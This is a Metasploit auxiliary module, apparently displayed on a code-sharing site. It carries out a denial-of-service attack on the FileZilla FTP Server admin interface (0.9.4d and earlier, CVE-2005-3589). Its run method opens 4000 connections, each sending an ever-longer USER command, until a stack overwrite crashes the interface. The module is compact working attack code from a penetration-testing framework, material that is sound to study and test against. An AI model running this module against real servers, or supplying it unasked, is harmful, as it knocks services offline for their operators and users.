Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Auxiliary
7
  include Msf::Exploit::Remote::Tcp
8
  include Msf::Auxiliary::Dos
9

10
  def initialize(info = {})
11
    super(update_info(info,
12
      'Name'		=> 'FileZilla FTP Server Admin Interface Denial of Service',
13
      'Description'	=> %q{
14
        This module triggers a Denial of Service condition in the FileZilla FTP
15
        Server Administration Interface in versions 0.9.4d and earlier.
16
        By sending a procession of excessively long USER commands to the FTP
17
        Server, the Administration Interface (FileZilla Server Interface.exe)
18
        when running, will overwrite the stack with our string and generate an
19
        exception. The FileZilla FTP Server itself will continue functioning.
20
      },
21
      'Author' 		=> [ 'aushack' ],
22
      'License'        	=> MSF_LICENSE,
23
      'References'     =>
24
        [
25
          [ 'BID', '15346' ],
26
          [ 'CVE', '2005-3589' ],
27
          [ 'EDB', '1336' ],
28
          [ 'OSVDB', '20817' ]
29
        ],
30
      'DisclosureDate' => '2005-11-07'))
31
  end
32

33
  def run
34
    print_status("Sending 4000 packets, this may take a while.")
35

36
    4000.times do |x|
37
      connect
38
      sock.put("USER #{"A" * x}\r\n")
39
      disconnect
40
    end
41
  end
42
end
43

44